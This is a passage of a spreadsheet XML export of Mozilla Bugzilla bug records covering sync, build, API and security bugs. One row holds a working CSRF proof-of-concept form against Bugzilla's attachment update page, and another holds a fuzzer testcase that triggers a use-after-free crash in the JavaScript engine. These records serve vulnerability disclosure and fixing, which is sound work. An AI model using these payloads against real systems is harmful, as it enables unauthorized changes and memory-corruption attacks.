          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5146" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5146" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5146" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5146" t="inlineStr"/>
      <c r="Q5146" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5146" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5146" t="inlineStr">
        <is>
          <t>Firefox 53</t>
        </is>
      </c>
      <c r="T5146" t="n">
        <v>1</v>
      </c>
      <c r="U5146" t="n">
        <v>0</v>
      </c>
      <c r="V5146" t="n">
        <v>12</v>
      </c>
      <c r="W5146" t="inlineStr">
        <is>
          <t>If we get a 401 fetching an initial token before we sync everything acts correctly. However, subsequent 401s hitting /certificate/sign will *not* enter needs-reauthenication state until the browser is restarted. This means that in this case the browser is silently failing to sync without the user being aware.
I simulated this with a simple patch which is below. It appears that sync isn't sending the notifications browser-fxaccounts expects to see to update the state. Adding "weave:service:sync:error" to the list of observers that cause us to update the UI appears would fix it.
patch against 50, which also requires the pref services.sync.debug.ignoreCachedAuthCredentials to be set to true (the hard-coded 7 is roughly how many token fetches will be done such that sync is actually running when the failure is simulated)
--- a/services/fxaccounts/FxAccounts.jsm
+++ b/services/fxaccounts/FxAccounts.jsm
@@ -33,6 +33,7 @@ XPCOMUtils.defineLazyModuleGetter(this, "FxAccountsProfile",
 XPCOMUtils.defineLazyModuleGetter(this, "Utils",
   "resource://services-sync/util.js");
+let numCertificateRequests = 0;
 // All properties exposed by the public FxAccounts API.
 var publicProperties = [
   "accountStatus",
@@ -1005,6 +1006,11 @@ FxAccountsInternal.prototype = {
     // and generate the cert.
     let certWillBeValidUntil = this.now() + CERT_LIFETIME;
+    ++numCertificateRequests;
+    if (numCertificateRequests == 7) {
+      log.debug("simulating certificate failure");
+      throw { code: 401, errno: ERRNO_INVALID_AUTH_TOKEN };
+    }
     let certificate = yield this.getCertificateSigned(accountData.sessionToken,
                                                       keyPair.rawKeyPair.serializedPublicKey,
                                                       CERT_LIFETIME);</t>
        </is>
      </c>
      <c r="X5146" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5147">
      <c r="A5147" t="n">
        <v>872801</v>
      </c>
      <c r="B5147" t="inlineStr">
        <is>
          <t>2013-05-15 15:50:17 -0700</t>
        </is>
      </c>
      <c r="C5147" t="inlineStr">
        <is>
          <t>Update the Terms of Use</t>
        </is>
      </c>
      <c r="D5147" t="inlineStr">
        <is>
          <t>2013-05-22 07:20:00 -0700</t>
        </is>
      </c>
      <c r="E5147" t="n">
        <v>1</v>
      </c>
      <c r="F5147" t="n">
        <v>1</v>
      </c>
      <c r="G5147" t="n">
        <v>6</v>
      </c>
      <c r="H5147" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5147" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J5147" t="inlineStr">
        <is>
          <t>Consumer Pages</t>
        </is>
      </c>
      <c r="K5147" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="L5147" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5147" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5147" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5147" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5147" t="inlineStr"/>
      <c r="Q5147" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5147" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5147" t="inlineStr">
        <is>
          <t>2013-05-23</t>
        </is>
      </c>
      <c r="T5147" t="n">
        <v>1</v>
      </c>
      <c r="U5147" t="n">
        <v>0</v>
      </c>
      <c r="V5147" t="n">
        <v>3</v>
      </c>
      <c r="W5147" t="inlineStr">
        <is>
          <t>Created attachment 750127
new tou
Attached is a new Terms of Use doc.  We should take its contents and put them on https://marketplace.firefox.com/terms-of-use</t>
        </is>
      </c>
      <c r="X5147" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5148">
      <c r="A5148" t="n">
        <v>913904</v>
      </c>
      <c r="B5148" t="inlineStr">
        <is>
          <t>2013-09-08 03:52:15 -0700</t>
        </is>
      </c>
      <c r="C5148" t="inlineStr">
        <is>
          <t>[SECURITY] CSRF when updating attachments</t>
        </is>
      </c>
      <c r="D5148" t="inlineStr">
        <is>
          <t>2024-05-30 08:07:21 -0700</t>
        </is>
      </c>
      <c r="E5148" t="n">
        <v>1</v>
      </c>
      <c r="F5148" t="n">
        <v>1</v>
      </c>
      <c r="G5148" t="n">
        <v>4</v>
      </c>
      <c r="H5148" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5148" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5148" t="inlineStr">
        <is>
          <t>Attachments &amp; Requests</t>
        </is>
      </c>
      <c r="K5148" t="inlineStr">
        <is>
          <t>2.16</t>
        </is>
      </c>
      <c r="L5148" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5148" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5148" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5148" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5148" t="inlineStr"/>
      <c r="Q5148" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5148" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5148" t="inlineStr">
        <is>
          <t>Bugzilla 4.0</t>
        </is>
      </c>
      <c r="T5148" t="n">
        <v>1</v>
      </c>
      <c r="U5148" t="n">
        <v>0</v>
      </c>
      <c r="V5148" t="n">
        <v>11</v>
      </c>
      <c r="W5148" t="inlineStr">
        <is>
          <t>PoC:
&lt;html&gt;
  &lt;!-- CSRF PoC - generated by Burp Suite Professional --&gt;
  &lt;body&gt;
    &lt;form action="https://landfill.bugzilla.org/bugzilla-tip/attachment.cgi" method="POST"&gt;
      &lt;input type="hidden" name="id" value="3100" /&gt;
      &lt;input type="hidden" name="action" value="update" /&gt;
      &lt;input type="hidden" name="contenttypemethod" value="manual" /&gt;
      &lt;input type="hidden" name="delta&amp;#95;ts" value="xxxxxx" /&gt;
      &lt;input type="hidden" name="token" value="xxxxx" /&gt;
      &lt;input type="hidden" name="description" value="asdasd123" /&gt;
      &lt;input type="hidden" name="filename" value="file&amp;#95;21994&amp;#46;txt" /&gt;
      &lt;input type="hidden" name="contenttypeentry" value="text&amp;#47;plain" /&gt;
      &lt;input type="hidden" name="comment" value="asd" /&gt;
      &lt;input type="hidden" name="flag&amp;#95;type&amp;#45;4" value="X" /&gt;
      &lt;input type="hidden" name="requestee&amp;#95;type&amp;#45;4" value="" /&gt;
      &lt;input type="hidden" name="flag&amp;#95;type&amp;#45;1" value="X" /&gt;
      &lt;input type="hidden" name="requestee&amp;#95;type&amp;#45;1" value="" /&gt;
      &lt;input type="hidden" name="flag&amp;#95;type&amp;#45;2" value="X" /&gt;
      &lt;input type="hidden" name="requestee&amp;#95;type&amp;#45;2" value="" /&gt;
      &lt;input type="hidden" name="flag&amp;#95;type&amp;#45;3" value="X" /&gt;
      &lt;input type="submit" value="Submit request" /&gt;
    &lt;/form&gt;
  &lt;/body&gt;
&lt;/html&gt;</t>
        </is>
      </c>
      <c r="X5148" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5149">
      <c r="A5149" t="n">
        <v>1437968</v>
      </c>
      <c r="B5149" t="inlineStr">
        <is>
          <t>2018-02-13 10:25:31 -0800</t>
        </is>
      </c>
      <c r="C5149" t="inlineStr">
        <is>
          <t>Remove unused refdata APIs</t>
        </is>
      </c>
      <c r="D5149" t="inlineStr">
        <is>
          <t>2019-02-18 12:59:38 -0800</t>
        </is>
      </c>
      <c r="E5149" t="n">
        <v>1</v>
      </c>
      <c r="F5149" t="n">
        <v>1</v>
      </c>
      <c r="G5149" t="n">
        <v>7</v>
      </c>
      <c r="H5149" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5149" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J5149" t="inlineStr">
        <is>
          <t>Treeherder: API</t>
        </is>
      </c>
      <c r="K5149" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L5149" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5149" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5149" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5149" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5149" t="inlineStr"/>
      <c r="Q5149" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5149" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5149" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5149" t="n">
        <v>1</v>
      </c>
      <c r="U5149" t="n">
        <v>0</v>
      </c>
      <c r="V5149" t="n">
        <v>4</v>
      </c>
      <c r="W5149" t="inlineStr">
        <is>
          <t>New Relic says the following haven't been accessed once in the last 7 days:
* BuildPlatformViewSet
* MachineViewSet
* ProductViewSet
...and these have only been accessed &lt;= 2 times:
* JobGroupViewSet (only accessed twice)
* JobTypeViewSet (only accessed twice)
* MachinePlatformViewSet (only accessed once)
See:
https://rpm.newrelic.com/accounts/677903/applications/14179757/transactions/table?type=app
Given that the data from them is:
* surfaced as part of other REST API response
* available separately via graphql/redash/read-only replica
...we should just remove these endpoints.</t>
        </is>
      </c>
      <c r="X5149" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5150">
      <c r="A5150" t="n">
        <v>268483</v>
      </c>
      <c r="B5150" t="inlineStr">
        <is>
          <t>2004-11-08 15:33:51 -0800</t>
        </is>
      </c>
      <c r="C5150" t="inlineStr">
        <is>
          <t>Lock icon appears even though http connection failed.</t>
        </is>
      </c>
      <c r="D5150" t="inlineStr">
        <is>
          <t>2006-03-12 18:08:49 -0800</t>
        </is>
      </c>
      <c r="E5150" t="n">
        <v>1</v>
      </c>
      <c r="F5150" t="n">
        <v>1</v>
      </c>
      <c r="G5150" t="n">
        <v>3</v>
      </c>
      <c r="H5150" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5150" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5150" t="inlineStr">
        <is>
          <t>Networking: HTTP</t>
        </is>
      </c>
      <c r="K5150" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5150" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5150" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5150" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5150" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5150" t="inlineStr">
        <is>
          <t>[sg:fix]</t>
        </is>
      </c>
      <c r="Q5150" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5150" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5150" t="inlineStr">
        <is>
          <t>mozilla1.8beta1</t>
        </is>
      </c>
      <c r="T5150" t="n">
        <v>1</v>
      </c>
      <c r="U5150" t="n">
        <v>0</v>
      </c>
      <c r="V5150" t="n">
        <v>17</v>
      </c>
      <c r="W5150" t="inlineStr">
        <is>
          <t>steps to reproduce:
1.  Go to http://mozilla.org
2.  Go to a https server that doesn't speak https.  For example, a https imap
server.
expected result:
an error dialog and the content of the page shouldn't change.  most importantly,
the security of the page should remain the same -- lock icon unlocked.
actual result:
i see an error dialog, but then the lock icon is locked and the details in the
page security dialog suggest that www.mozilla.org has been verified.
marking security sensitive per conversation with darin</t>
        </is>
      </c>
      <c r="X5150" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5151">
      <c r="A5151" t="n">
        <v>1252707</v>
      </c>
      <c r="B5151" t="inlineStr">
        <is>
          <t>2016-03-01 16:51:33 -0800</t>
        </is>
      </c>
      <c r="C5151" t="inlineStr">
        <is>
          <t>Crash [@ IsInsideNursery] with OOM and use-after-free</t>
        </is>
      </c>
      <c r="D5151" t="inlineStr">
        <is>
          <t>2017-05-09 11:20:42 -0700</t>
        </is>
      </c>
      <c r="E5151" t="n">
        <v>1</v>
      </c>
      <c r="F5151" t="n">
        <v>1</v>
      </c>
      <c r="G5151" t="n">
        <v>3</v>
      </c>
      <c r="H5151" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5151" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5151" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5151" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5151" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5151" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5151" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5151" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5151" t="inlineStr">
        <is>
          <t>[jsbugmon:update][adv-main46+][adv-esr45.1+][adv-esr38.8+]</t>
        </is>
      </c>
      <c r="Q5151" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5151" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5151" t="inlineStr">
        <is>
          <t>mozilla48</t>
        </is>
      </c>
      <c r="T5151" t="n">
        <v>1</v>
      </c>
      <c r="U5151" t="n">
        <v>0</v>
      </c>
      <c r="V5151" t="n">
        <v>23</v>
      </c>
      <c r="W5151" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision e15383656900 (build with --enable-optimize --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --disable-tests --enable-debug, run with --fuzzing-safe --thread-count=2 --ion-extra-checks --ion-offthread-compile=off):
STATUS = "STATUS "
function printStatus(msg) {
    lines = msg.split();
    print(STATUS + lines[0]);
}
Object.defineProperty(Object.prototype, 'e', {});
Object.prototype.apply = summary = 'GC without recursion';
Object.prototype[0] = /a/
printStatus(summary);
oomAfterAllocations(10);
printStatus(summary)({}.__proto__.watch('x', print));
Backtrace:
Program received signal SIGSEGV, Segmentation fault.
IsInsideNursery (cell=0xfffc4d4d4d4d4d4d) at js/src/debug64/dist/include/js/HeapAPI.h:333
#0  IsInsideNursery (cell=0xfffc4d4d4d4d4d4d) at js/src/debug64/dist/include/js/HeapAPI.h:333
#1  isTenured (this=0xfffc4d4d4d4d4d4d) at js/src/gc/Heap.h:222
#2  js::gc::TenuredCell::arenaHeader (this=0xfffc4d4d4d4d4d4d) at js/src/gc/Heap.h:1411
#3  0x0000000000979f3f in isMarked (color=0, this=&lt;optimized out&gt;) at js/src/gc/Heap.h:1380
#4  js::Shape::sweep (this=this@entry=0x7ffff7e8ce70) at js/src/jspropertytree.cpp:206
#5  0x00000000008ff9a4 in SweepThing (shape=0x7ffff7e8ce70) at js/src/jsgc.cpp:5463
#6  SweepArenaList&lt;js::Shape&gt; (sliceBudget=..., arenasToSweep=&lt;optimized out&gt;) at js/src/jsgc.cpp:5484
#7  js::gc::GCRuntime::sweepPhase (this=this@entry=0x7ffff695d430, sliceBudget=...) at js/src/jsgc.cpp:5585
#8  0x0000000000908113 in js::gc::GCRuntime::incrementalCollectSlice (this=this@entry=0x7ffff695d430, budget=..., reason=reason@entry=JS::gcreason::DESTROY_CONTEXT) at js/src/jsgc.cpp:6192
#9  0x00000000009092e0 in js::gc::GCRuntime::gcCycle (this=this@entry=0x7ffff695d430, nonincrementalByAPI=nonincrementalByAPI@entry=true, budget=..., reason=reason@entry=JS::gcreason::DESTROY_CONTEXT) at js/src/jsgc.cpp:6415
#10 0x0000000000909821 in js::gc::GCRuntime::collect (this=this@entry=0x7ffff695d430, nonincrementalByAPI=nonincrementalByAPI@entry=true, budget=..., reason=reason@entry=JS::gcreason::DESTROY_CONTEXT) at js/src/jsgc.cpp:6521
#11 0x0000000000909a53 in js::gc::GCRuntime::gc (this=this@entry=0x7ffff695d430, gckind=gckind@entry=GC_NORMAL, reason=reason@entry=JS::gcreason::DESTROY_CONTEXT) at js/src/jsgc.cpp:6579
#12 0x00000000008bb40c in js::DestroyContext (cx=0x7ffff6907800, mode=js::DCM_FORCE_GC) at js/src/jscntxt.cpp:181
#13 0x00000000008bb65e in JS_DestroyContext (cx=&lt;optimized out&gt;) at js/src/jsapi.cpp:581
#14 0x000000000048076f in DestroyContext (withGC=true, cx=0x7ffff6907800) at js/src/shell/js.cpp:6351
#15 main (argc=&lt;optimized out&gt;, argv=&lt;optimized out&gt;, envp=&lt;optimized out&gt;) at js/src/shell/js.cpp:7253
rax	0xfffc4d4d4d4d4d4d	-1040905502110387
rbx	0xfffc4d4d4d4d4d4d	-1040905502110387
rcx	0xfffc4d4d4d400000	-1040905502982144
rdx	0xfffc4d4d4d4fffe8	-1040905501933592
rsi	0x0	0
rdi	0xfffc4d4d4d4d4d4d	-1040905502110387
rbp	0x7fffffffd030	140737488343088
rsp	0x7fffffffd030	140737488343088
r8	0x0	0
r9	0x7ffff6a00368	140737331069800
r10	0x7ffff6930420	140737330218016
r11	0x7ffff6a00379	140737331069817
r12	0x7ffff7e8ce70	140737352617584
r13	0x7ffff46ac000	140737294024704
r14	0x7fffffffd550	140737488344400
r15	0x7ffff7e8ce70	140737352617584
rip	0x4dc950 &lt;js::gc::TenuredCell::arenaHeader() const+32&gt;
=&gt; 0x4dc950 &lt;js::gc::TenuredCell::arenaHeader() const+32&gt;:	mov    (%rdx),%edx
   0x4dc952 &lt;js::gc::TenuredCell::arenaHeader() const+34&gt;:	test   %edx,%edx
This looks like a use-after-free crash or some other memory corruption given the memory patterns in the crashing register. Marking s-s.</t>
        </is>
      </c>
      <c r="X5151" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5152">
      <c r="A5152" t="n">
        <v>1813424</v>
      </c>
      <c r="B5152" t="inlineStr">
        <is>
          <t>2023-01-29 19:26:54 -0800</t>
        </is>
      </c>
      <c r="C5152" t="inlineStr">
        <is>
          <t>Web Crypto ImportKey crashes tab</t>
        </is>
      </c>
      <c r="D5152" t="inlineStr">
        <is>
          <t>2024-06-02 11:56:21 -0700</t>
        </is>
      </c>
      <c r="E5152" t="n">
        <v>1</v>
      </c>
      <c r="F5152" t="n">
        <v>1</v>
      </c>
      <c r="G5152" t="n">
        <v>3</v>
      </c>
      <c r="H5152" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5152" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5152" t="inlineStr">
        <is>
          <t>DOM: Web Crypto</t>
        </is>
      </c>
      <c r="K5152" t="inlineStr">
        <is>
          <t>Firefox 105</t>
        </is>
      </c>
      <c r="L5152" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5152" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5152" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5152" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5152" t="inlineStr">
        <is>
          <t>[adv-main110+][adv-esr102.8+]</t>
        </is>
      </c>
      <c r="Q5152" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5152" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S5152" t="inlineStr">
        <is>
          <t>111 Branch</t>
        </is>
      </c>
      <c r="T5152" t="n">
        <v>0</v>
      </c>
      <c r="U5152" t="n">
        <v>0</v>
      </c>
      <c r="V5152" t="n">
        <v>12</v>
      </c>
      <c r="W5152" t="inlineStr">
        <is>
          <t>Created attachment 9314780
WebCrypto-crash-ff.png
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Steps to reproduce:
Import an SPKI RSA Public Key but specify the type of the key as ECDSA P-256.
try {
        await crypto.subtle.importKey(
                "spki", 
                Buffer.from(pem, 'base64'), 
                { 
                        name: "ECDSA", 
                        namedCurve: curve
                }, 
                false, 
                ["verify"]
        );
} catch (err) { 
        console.error(err); 
}
Contents of the `pem` variable:
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAs6kchlNLKPbvVTJrAhPP
B+b1JMODYEmVLS6jBBltlN4asrVzUIxstVzbmhElDBkWnqM0VsCqrgTGK/iCu4Hd
/Io8oABQlWvH+M/2Pync7HBtvXZcGCz9RXRTBaTlpAe8eR6CJjT0YmQOOFUXxUsf
95/hLOf2hSryelC+kIf0nCRCkHEUqpNdc8YUXDLnzoMWyClfsisn0lwmVWweWIuK
3CjmiDUP5O9zh7fiZpCRerr3emYCYjLtZfw3qeweDclSmVwErS2qPXgQw4L8DV5D
8oZZT01ckLZGIs3OTYxiUDvsHxLaNdmN0WnbsDiKBcqj7A3uMN6MkrWW/2d0uEwN
swIDAQAB
Actual results:
The tab crashed (as per screenshot).
Expected results:
I understand that this is caused by a misuse of the Webcrypto library.
However I believe an Error or Exception should be thrown instead of a crash.</t>
        </is>
      </c>
      <c r="X5152" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5153">
      <c r="A5153" t="n">
        <v>384624</v>
      </c>
      <c r="B5153" t="inlineStr">
        <is>
          <t>2007-06-15 14:00:15 -0700</t>
        </is>
      </c>
      <c r="C5153" t="inlineStr">
        <is>
          <t>Update the Windows refplatform</t>
        </is>
      </c>
      <c r="D5153" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E5153" t="n">
        <v>1</v>
      </c>
      <c r="F5153" t="n">
        <v>1</v>
      </c>
      <c r="G5153" t="n">
        <v>5</v>
      </c>
      <c r="H5153" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5153" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J5153" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5153" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5153" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5153" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N5153" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5153" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5153" t="inlineStr"/>
      <c r="Q5153" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5153" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5153" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5153" t="n">
        <v>1</v>
      </c>
      <c r="U5153" t="n">
        <v>0</v>
      </c>
      <c r="V5153" t="n">
        <v>19</v>
      </c>
      <c r="W5153" t="inlineStr">
        <is>
          <t>The Windows refplatform needs the following updates:
1) Use MozillaBuild instead of a bunch of custom packages
All you should need at this point is MozillaBuild, MSVC, and the JDK
2) Perhaps upgrade to MSVC8SP1
We *might* want to update to MSVC8SP1. However, there are known performance issues in that configuration when building with PDBs enabled (which the tinderboxes do). MS has published a hotfix for this issue, but apparently IT has had trouble getting their hands on it:
http://support.microsoft.com/kb/935225
Alternately, we could think about taking bug 382297, which according to vlad fixes the perf issue, but I'm worried about *that* breaking -jN builds and/or not working with the hotfix. I'm sorry I can't be more definitive about this :-(
This should happen by Friday June 22 if it's going to make 1.9a6... and it probably should happen by then if we want this for 1.9
Random note, VC8SP1 has an updated version of the CRT, so we'll need to make sure that the CRT shipping is correct: I can't find WIN32_REDIST_DIR in the tinder-config, which confuses me a little bit: is it set in the tinderbox environment directly?</t>
        </is>
      </c>
      <c r="X5153" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5154">
      <c r="A5154" t="n">
        <v>1514124</v>
      </c>
      <c r="B5154" t="inlineStr">
        <is>
          <t>2018-12-13 22:51:25 -0800</t>
        </is>
      </c>
      <c r="C5154" t="inlineStr">
        <is>
          <t>Don't pass --x86 to xz when creating mar files for Windows ARM64</t>
        </is>
      </c>
      <c r="D5154" t="inlineStr">
        <is>
          <t>2019-03-21 12:13:06 -0700</t>
        </is>
      </c>
      <c r="E5154" t="n">
        <v>1</v>
      </c>
      <c r="F5154" t="n">
        <v>1</v>
      </c>
      <c r="G5154" t="n">
        <v>5</v>
      </c>
      <c r="H5154" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5154" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J5154" t="inlineStr">
        <is>
          <t>Release Automation: Updates</t>
        </is>
      </c>
      <c r="K5154" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5154" t="inlineStr">
        <is>
          <t>ARM64</t>
        </is>
      </c>
      <c r="M5154" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N5154" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5154" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5154" t="inlineStr"/>
      <c r="Q5154" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5154" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5154" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5154" t="n">
        <v>1</v>
      </c>
      <c r="U5154" t="n">
        <v>0</v>
      </c>
      <c r="V5154" t="n">
        <v>8</v>
      </c>
      <c r="W5154" t="inlineStr">
        <is>
          <t>There are multiple sites within the following two files where --x86 should not be passed to xz when creating mar files for Windows ARM64. Please continue to pass --x86 to xz for all other platforms.
https://dxr.mozilla.org/mozilla-central/source/tools/update-packaging/make_full_update.sh#99
https://dxr.mozilla.org/mozilla-central/source/tools/update-packaging/make_incremental_update.sh#175
I don't know if there are other releng files for creating mar files where this will need to be changed for Windows ARM64.</t>
        </is>
      </c>
      <c r="X5154" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5155">
      <c r="A5155" t="n">
        <v>874394</v>
      </c>
      <c r="B5155" t="inlineStr">
        <is>
          <t>2013-05-21 04:13:55 -0700</t>
        </is>
      </c>
      <c r="C5155" t="inlineStr">
        <is>
          <t>Test failure in '/testAwesomeBar/testPasteLocationBar.js' due to the urlbar-container not being found</t>
        </is>
      </c>
      <c r="D5155" t="inlineStr">
        <is>
          <t>2019-07-03 12:10:43 -0700</t>
        </is>
      </c>
      <c r="E5155" t="n">
        <v>1</v>
      </c>
      <c r="F5155" t="n">
        <v>1</v>
      </c>
      <c r="G5155" t="n">
        <v>6</v>
      </c>
      <c r="H5155" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5155" t="inlineStr">
        <is>
          <t>Mozilla QA Graveyard</t>
        </is>
      </c>
      <c r="J5155" t="inlineStr">
        <is>
          <t>Mozmill Tests</t>
        </is>
      </c>
      <c r="K5155" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5155" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5155" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5155" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5155" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5155" t="inlineStr">
        <is>
          <t>[mozmill-test-failure][australis][sprint2013-35]</t>
        </is>
      </c>
      <c r="Q5155" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5155" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5155" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5155" t="n">
        <v>1</v>
      </c>
      <c r="U5155" t="n">
        <v>0</v>
      </c>
      <c r="V5155" t="n">
        <v>15</v>
      </c>
      <c r="W5155" t="inlineStr">
        <is>
          <t>The test: /testAwesomeBar/testPasteLocationBar.js fails on all OS with Australis build 
Fails due to line: http://hg.mozilla.org/qa/mozmill-tests/file/05730582186d/lib/toolbars.js#l18
URLBAR_CONTAINER needs to contain: 'id("nav-bar-customizationtarget")' since this is the element that contains the urlbar-container. The line should be changed to:
const URLBAR_CONTAINER = '/id("main-window")/id("tab-view-deck")/[0]' +
                         '/id("navigator-toolbox")/id("nav-bar")/id("nav-bar-customizationtarget")/id("urlbar-container")';
NOTE: The changing of the line should be done only if nodeCollector cannot be used instead of the Lookup expression</t>
        </is>
      </c>
      <c r="X5155" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5156">
      <c r="A5156" t="n">
        <v>1132468</v>
      </c>
      <c r="B5156" t="inlineStr">
